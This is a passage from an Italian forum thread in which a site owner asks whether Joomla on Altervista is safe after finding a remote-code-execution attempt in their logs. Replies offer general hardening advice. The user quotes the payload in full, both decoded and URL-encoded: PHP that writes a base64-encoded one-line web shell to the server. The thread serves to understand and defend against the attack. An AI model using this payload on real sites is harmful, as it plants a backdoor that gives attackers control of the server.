Vulnerabilità Joomla

[huntersMrHide]

Salve,
ho notato che sono state richiamate alcune pagine del mio sito con parametri che evidenziano un tentativo di esecuzione di codice remoto (RCE).
Vorrei sapere se usando Joomla qui su Altervista sono al riparo da questi possibili attacchi o se è necessario fare qualcosa per non essere esposti a tali attacchi.

Grazie

[RedWebSite]

Ciao, tieni sempre joomla e tutte le estensioni aggiornate, non scaricare mai niente che non si trova sui siti ufficiali degli sviluppatori, parti sempre dalla jed per cercare estensioni, per un pò di sicurezza in più attiva cloudflare nel pannello di controllo altervista.

[karl94]

Non dipende da AlterVista, ma dalla versione di Joomla che hai installato, e se questa è vulnerabile o meno allo specifico attacco.
Puoi riportare più dettagli al riguardo?

[huntersMrHide]

Grazie del suggerimento.
In ogni caso il problema che hoi riscontrato non è dovuto a qualche estensione, ma al fatto che qualcuno ha aggiunto all'url della home page dei parametri che mirano a testare la fulnerabilità del sito. Da quello che ho capito è stato tentata la creazione di un nuovo file php.
Di seguito le istruzioni inserite nella url:

Codice PHP:

@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo '->|';
file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));
echo '|<-';


Ora la domanda rimane la stessa:
contro questo tipo di attacco joomla qui su altervista è vulnerabile oppure no?

Grazie

[karl94]

Quello è solamente il payload dell'attacco, del codice che i malintenzionati tentano di far eseguire sul server sfruttando una qualche vulnerabilità di Joomla. Se però non indichi esattamente dove l'hai trovato, quali erano i parametri della ricerca e così via non è possibile identificare la vulnerabilità che tentano di sfruttare.

[huntersMrHide]

Registro ai fini statistici l'url delle pagine che vengono visualizzate dagli utenti e tra le registrazioni ho trovato questa stringa:

Codice:

?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B

accodata alla ad una url normale.

Spero di essere stato più chiaro.

Grazie

[karl94]

Ma perché non riporti l'URL per intero? Dal solo spezzone che hai riportato non mi sembrerebbe un attacco mirato a Joomla.

[huntersMrHide]

Non l'ho riportato completamente perchè non ci sono altri parametri, quella stringa era accodata alla url della index.

Se non è un attacco a Joomla ok, io non sarò abbastanza esperto per dirlo, comunque non mi sembra una buona cosa che qualcuno si sia preoccupato di aggiungere una stringa del genere.
Non so immaginare lo scopo e magari qualcuno me lo può spiegare e capire se è necessario correre ai ripari ed eventualmente come.

Grazie

[karl94]

quella stringa era accodata alla url della index.

Ecco, non l'avevi specificato. In questi casi è importante specificare tutti i dettagli che si posseggono, anche se non sembrano rilevanti.

Ad ogni modo nel tuo caso non mi sembra un attacco al tuo CMS o al tuo specifico sito web, è probabilmente uno dei miliardi di attacchi fatti alla cieca fatti comunemente, se non c'è altro non dovresti preoccuparti di alcunché.

Segui semplicemente i comuni consigli, quelli che RedWebSite ha scritto nel suo messaggio.